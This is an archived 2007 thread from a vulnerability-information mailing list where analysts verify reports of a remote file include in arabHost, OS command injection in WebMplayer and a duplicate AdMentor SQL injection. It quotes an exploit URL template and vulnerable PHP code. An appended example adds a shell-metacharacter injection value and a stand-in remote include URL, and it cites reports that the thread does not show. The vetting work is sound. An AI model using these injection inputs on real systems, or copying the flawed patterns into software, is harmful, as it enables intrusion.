Confirmed in CVE data, mentioned previously, by a few hundred - 21%, compared with 14% if there was an even distribution.

Week before Thanksgiving was number 3 - but only 2 less than the week starting Oct 15, the lead - and these minor discrepancies are insignificant. Plus we're slightly less complete in Nov/Dec than earlier months. Top 10 weeks ranged from 159 to 182 CVEs. Week starting Jan 22 was slowest at 73. I remember a few years ago when that would be an insane month...

> * Weekend disclosure of vulnerabilities in 2006 more than doubled that of
> 2005 to reach 17.6 percent of all disclosures.

17 percent for CVEs too; around 10% in 2005. Interesting!

> * High impact vulnerabilities continue to decrease as a percentage of
> total vulnerabilities in 2006.

Don't measure this.

> * 3 percent of vulnerabilities under the Common Vulnerability Scoring
> System (CVSS) were evaluated as being critical impact vulnerabilities with
> a score of 10.

Could look at NVD and figure this out but that's not part of my procrastination plan.

> * The top 10 vulnerable software vendors accounted for 14 percent of all
> 2006 vulnerabilities.

Well, they're mostly OS++ vendors right? They have a bigger vulnerability surface than anyone, bigger than a bulletin board written in PHP with register_globals, allow_fopen_url, and magic_quotes_gpc at their weakest settings.

> * 17 percent of the vulnerabilities identified within the top 10
> vulnerable vendors products were un-patched at the end of 2006. This
> contrasts with 65 percent un-patched for all other vulnerabilities
> recorded in the year.

CVE has held steady for years at ~45-50% vendor acknowledgement, which usually correlates to patches but not always; and we have more stringent rules for ack than others. Estimate 40% for 2006. Can't really compare ISS' stat with ours though.

> * 88.4 percent of all 2006 vulnerabilities could be exploited remotely.
At least 80% for CVE, maybe more; this field isn't always filled out, and we have "unknown" and "other" categories. - Steve From mjc at redhat.com Tue Feb 27 04:02:40 2007 From: mjc at redhat.com (Mark J Cox) Date: Tue, 27 Feb 2007 09:02:40 +0000 (GMT) Subject: [VIM] IBM ISS 2006 Threat Review In-Reply-To: References: Message-ID: <0702270859260.20463@somethingunique.awe.com> > there are more sources, So time for a new project, the Common Reporter Enumeration (CRE)? Would be kind of nice to have a measurable mapping between CVE and reporter, and would allow third parties to publish things like CRE-to-reliability mapping ;) Mark From heinbockel at mitre.org Tue Feb 27 09:13:28 2007 From: heinbockel at mitre.org (Heinbockel, Bill) Date: Tue, 27 Feb 2007 09:13:28 -0500 Subject: [VIM] Verified: arabhost function.php RFI Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC019EF714@IMCSRV5.MITRE.ORG> BUGTRAQ:20070222 Hasadya Raed http://www.securityfocus.com/archive/1/archive/1/460933/100/0/threaded > B.File : > function.php > > V.Code : > include($adminfloder"); > > Expl : http://www.victim.com/path/function.php?adminfolder=[Shell-Attack] Since the script download at http://delmaa.com/upfile/users/arabHost.zip is currently 404. I'll refer to the Google Code cache of arabHost/function.php: http://www.google.com/codesearch?hl=en&q=show:y_09L32ZX4g:c-H4PKvziZc:C SW92BIlIMw&sa=N&ct=rd&cs_p=http://delmaa.com/upfile/users/arabHost.zip& cs_f=arabHost/function.php Code (lines 1-4): > > include("includes/protaction.php"); > include("$adminfloder/config.php"); And the package contains no "includes/protaction.php" file (and the ReadMe.html is in Arabic), so this issue does appear valid. Sorry jericho, no disputes this time. Bill "That's False Too!" Heinbockel Infosec Engineer The MITRE Corporation 202 Burlington Rd. 
MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

From str0ke at milw0rm.com Tue Feb 27 10:20:02 2007
From: str0ke at milw0rm.com (str0ke)
Date: Tue, 27 Feb 2007 09:20:02 -0600
Subject: [VIM] Verified: arabhost function.php RFI
In-Reply-To: <224FBC6B814DBD4E9B9E293BE33A10DC019EF714@IMCSRV5.MITRE.ORG>
References: <224FBC6B814DBD4E9B9E293BE33A10DC019EF714@IMCSRV5.MITRE.ORG>
Message-ID: <814b9d50702270720s72091d1bo3b6b39b619bcff09@mail.gmail.com>

Bill "That's False Too!" Heinbockel,

I umm tested this a while back and the file did exist includes/protaction.php. :(

In the email back to the author I stated.

includes/protaction.php contains $adminfloder :(

Very strange.

/str0ke

On 2/27/07, Heinbockel, Bill wrote:
> BUGTRAQ:20070222 Hasadya Raed
> http://www.securityfocus.com/archive/1/archive/1/460933/100/0/threaded
>
> > B.File :
> > function.php
> >
> > V.Code :
> > include($adminfloder");
> >
> > Expl :
> http://www.victim.com/path/function.php?adminfolder=[Shell-Attack]
>
>
> Since the script download at
> http://delmaa.com/upfile/users/arabHost.zip
> is currently 404. I'll refer to the Google Code cache of
> arabHost/function.php:
>
> http://www.google.com/codesearch?hl=en&q=show:y_09L32ZX4g:c-H4PKvziZc:CSW92BIlIMw&sa=N&ct=rd&cs_p=http://delmaa.com/upfile/users/arabHost.zip&cs_f=arabHost/function.php
>
> Code (lines 1-4):
> >
> >
> > include("includes/protaction.php");
> > include("$adminfloder/config.php");
>
> And the package contains no "includes/protaction.php" file (and
> the ReadMe.html is in Arabic), so this issue does appear valid.
>
>
> Sorry jericho, no disputes this time.
>
> Bill "That's False Too!" Heinbockel
> Infosec Engineer
> The MITRE Corporation
> 202 Burlington Rd.
> MS S145
> Bedford, MA 01730
> heinbockel at mitre.org
> 781-271-2615
>

From heinbockel at mitre.org Tue Feb 27 11:29:17 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Tue, 27 Feb 2007 11:29:17 -0500
Subject: [VIM] Verified: arabhost function.php RFI
In-Reply-To: <814b9d50702270720s72091d1bo3b6b39b619bcff09@mail.gmail.com>
References: <224FBC6B814DBD4E9B9E293BE33A10DC019EF714@IMCSRV5.MITRE.ORG> <814b9d50702270720s72091d1bo3b6b39b619bcff09@mail.gmail.com>
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC019EF76C@IMCSRV5.MITRE.ORG>

Interesting... in the Google Code cache there is no protaction.php.

In includes/, I see
  aHostTemplete.php
  files/Host.php
  files/domin.php
  files/rellese.php
  files/send.php
  files/server.php

Since the original archive is no longer available, this could be a case of the file being missing from Google cache or this is a different version than the one you examined.

William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615

>-----Original Message-----
>From: vim-bounces at attrition.org
>[mailto:vim-bounces at attrition.org] On Behalf Of str0ke
>Sent: Tuesday, 27 February, 2007 10:20
>To: Vulnerability Information Managers
>Subject: Re: [VIM] Verified: arabhost function.php RFI
>
>Bill "That's False Too!" Heinbockel,
>
>I umm tested this a while back and the file did exist
>includes/protaction.php. :(
>
>In the email back to the author I stated.
>
>includes/protaction.php contains $adminfloder :(
>
>Very strange.
>
>/str0ke
>
>On 2/27/07, Heinbockel, Bill wrote:
>> BUGTRAQ:20070222 Hasadya Raed
>> http://www.securityfocus.com/archive/1/archive/1/460933/100/0/threaded
>>
>> > B.File :
>> > function.php
>> >
>> > V.Code :
>> > include($adminfloder");
>> >
>> > Expl :
>> http://www.victim.com/path/function.php?adminfolder=[Shell-Attack]
>>
>>
>> Since the script download at
>> http://delmaa.com/upfile/users/arabHost.zip
>> is currently 404.
>> I'll refer to the Google Code cache of
>> arabHost/function.php:
>>
>> http://www.google.com/codesearch?hl=en&q=show:y_09L32ZX4g:c-H4PKvziZc:CSW92BIlIMw&sa=N&ct=rd&cs_p=http://delmaa.com/upfile/users/arabHost.zip&cs_f=arabHost/function.php
>>
>> Code (lines 1-4):
>> >
>> >
>> > include("includes/protaction.php");
>> > include("$adminfloder/config.php");
>>
>> And the package contains no "includes/protaction.php" file (and
>> the ReadMe.html is in Arabic), so this issue does appear valid.
>>
>>
>> Sorry jericho, no disputes this time.
>>
>> Bill "That's False Too!" Heinbockel
>> Infosec Engineer
>> The MITRE Corporation
>> 202 Burlington Rd. MS S145
>> Bedford, MA 01730
>> heinbockel at mitre.org
>> 781-271-2615
>>
>

From coley at mitre.org Tue Feb 27 12:08:59 2007
From: coley at mitre.org (Steven M. Christey)
Date: Tue, 27 Feb 2007 12:08:59 -0500 (EST)
Subject: [VIM] WebMplayer "eval injection" is actually OS command injection
Message-ID: <200702271708.l1RH8x7D027399@faron.mitre.org>

Ref: CONFIRM:http://sourceforge.net/project/shownotes.php?release_id=486880&group_id=172354

The statement "index.php: Bugfix: $val must be numeric, so no other can be commands inserted" has apparently been interpreted as eval injection by some sources (and a "param" parameter), but a code review for index.php in 0.6alpha shows:

  while(list($param) = each($_GET)){
    if(isset($_GET[$param])){$val = $_GET[$param];}
    if (!empty($val)){
      exec($aumix." -".$param." ".$val);
    }
  }

$aumix is an executable.

The "empty($val)" statement was fixed to:

  if (!empty($val) && is_numeric($val)){

So:

1) This is "OS Command Injection" by shell metacharacters in the exec(), with no escapeshellarg/escapeshellcmd.

2) "param" is not a parameter name at all, except the code seems to allow arbitrarily-named parameters, so maybe "param" would actually work.
- Steve

From heinbockel at mitre.org Wed Feb 28 14:39:36 2007
From: heinbockel at mitre.org (Heinbockel, Bill)
Date: Wed, 28 Feb 2007 14:39:36 -0500
Subject: [VIM] AdMentor SQL injection Exploit (dupe of CVE-2007-0575)
Message-ID: <224FBC6B814DBD4E9B9E293BE33A10DC019EF998@IMCSRV5.MITRE.ORG>

BUGTRAQ:20070220 AdMentor Script Remote SQL injection Exploit
http://www.securityfocus.com/archive/1/archive/1/460632/100/100/threaded

Cr at zy_King claims that there is a SQL injection in AdMentor (admin/login.asp) via the kullanici and parola parameters.

After some research, AdMentor does not appear to be distributed in Turkish, while kullanici and parola are Turkish for username and password.

Not surprisingly, the provided exploit forum looks strangely similar to the one used here:
http://www.securityfocus.com/archive/1/archive/1/453234/100/0/threaded

Anyway, this appears to be a dupe of CVE-2007-0575 from last month.

=====================================================
Multiple SQL injection vulnerabilities in the administrative login page in ASPCode.net AdMentor allow remote attackers to execute arbitrary SQL commands via the (1) Userid and (2) Password fields.

William Heinbockel
Infosec Engineer
The MITRE Corporation
202 Burlington Rd. MS S145
Bedford, MA 01730
heinbockel at mitre.org
781-271-2615
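The two request-to-sink shapes the thread keeps returning to, the request-fed include() in arabHost's function.php (and the drake/linx/SIPS reports before it) and the request-fed exec() loop in Steve's WebMplayer review, each beside a hardened form, as an added example. This is not code from the list, from arabHost or from WebMplayer; the $aumix path, the option allowlist, the include-name allowlist and the constructed request are assumptions. The functions only build the include path or command line and return it, they never include() or exec() anything, so the contrast can be inspected from the CLI.

```php
<?php
// Added example (not from the VIM thread, arabHost or WebMplayer): request-fed
// include() and exec() patterns beside hardened forms. Nothing here is actually
// included or executed; each function returns the string it would have used.
// $aumix, the option allowlist and the include allowlist are assumptions.
declare(strict_types=1);

// --- (1) include() fed from the request (register_globals-era RFI shape) ---

// Risky: with register_globals=On the client sets $adminfloder via the query
// string, and with remote includes enabled the include becomes a remote fetch.
function risky_include_target(array $request): string
{
    $adminfloder = $request['adminfloder'] ?? '';    // client-controlled
    return "$adminfloder/config.php";
}

// Hardened: the base directory comes from the script's own location (the same
// idea as drake's dirname(__FILE__) in version.php) and the file name must be
// one of a fixed set, so nothing from the request reaches the path.
function safe_include_target(string $name): ?string
{
    $allowed = ['config.php', 'functions.php'];      // assumed allowlist
    if (!in_array($name, $allowed, true)) {
        return null;                                 // unknown name: refuse
    }
    return __DIR__ . '/includes/' . $name;
}

// --- (2) exec() fed from the request (WebMplayer-style command injection) ---

// Risky: as in the quoted index.php, every query parameter name and value is
// pasted into the shell command line; "50; ..." therefore runs a second command.
function risky_command_lines(array $request, string $aumix = '/usr/bin/aumix'): array
{
    $lines = [];
    foreach ($request as $param => $val) {
        if (!empty($val)) {
            $lines[] = $aumix . " -" . $param . " " . $val;
        }
    }
    return $lines;
}

// Hardened: allowlist the option name, require a plain 0..100 integer and quote
// the value with escapeshellarg() so no shell metacharacter survives.
function safe_command_lines(array $request, string $aumix = '/usr/bin/aumix'): array
{
    $allowed = ['v' => true, 'w' => true];           // assumed: two volume options
    $lines = [];
    foreach ($request as $param => $val) {
        if (!isset($allowed[$param])) {
            continue;                                // option name never meant to be accepted
        }
        if (!is_string($val) || !ctype_digit($val) || (int)$val > 100) {
            continue;                                // not a plain integer in range
        }
        $lines[] = escapeshellcmd($aumix) . ' -' . $param . ' ' . escapeshellarg($val);
    }
    return $lines;
}

// Constructed request, the kind the "$val must be numeric" bugfix was about.
$request = [
    'v'           => '50; echo injected',            // value carrying a shell metacharacter
    'w'           => '70',                           // benign value
    'x'           => '1',                            // option the script never defined
    'adminfloder' => 'http://remote.example/x.txt?', // constructed remote include base
];

echo "risky include : ", risky_include_target($request), PHP_EOL;
echo "safe include  : ", safe_include_target('config.php'), PHP_EOL;
echo "safe include  : ", var_export(safe_include_target('../../etc/passwd'), true), PHP_EOL;
echo "risky commands:", PHP_EOL, implode(PHP_EOL, risky_command_lines($request)), PHP_EOL;
echo "safe commands :", PHP_EOL, implode(PHP_EOL, safe_command_lines($request)), PHP_EOL;
```

Run it with `php example.php`: the risky loop emits one command line per parameter, including the metacharacter-laden `-v` value and the never-intended `-x` and `-adminfloder` options, while the hardened loop emits only `-w '70'`. The hardened include helper is the code-level counterpart of what the list kept checking in documentation (a base path derived from the installation rather than from a request variable); turning register_globals off and, on PHP 5.2 and later, setting allow_url_include=Off removes the remote half of the include pattern regardless of the script.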